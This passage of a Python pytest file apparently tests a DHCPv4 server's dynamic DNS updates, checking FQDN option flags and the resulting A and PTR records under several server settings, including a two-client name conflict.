srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
misc.test_setup()
srv_control.start_srv('DHCP', 'stopped')
srv_control.clear_some_data('leases')
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_two_dhci_Sflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.')
# Client 2 add
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.')
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_dhci_conflicts_Sflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
# Client 2 add
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'client2.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
# Client 2 try to update client's 1 domain
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.')
# address and domain name should not be changed!
misc.test_procedure()
srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
misc.test_procedure()
srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_add_success_withoutflag_override_client():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('override-client-update', True)
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 3)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.reverse_add
def test_ddns4_notsig_rev_success_withoutflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 0)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.reverse_add
def test_ddns4_notsig_rev_withoutflag_notenabled():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', False)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
# Response option 81 MUST contain flags 0. #later make it 's' 'n' and 'o' should be 10
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.reverse_add
def test_ddns4_notsig_rev_Nflag_override_no_update():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('override-no-update', True)
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_flags', 'N')
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 3)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com.', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
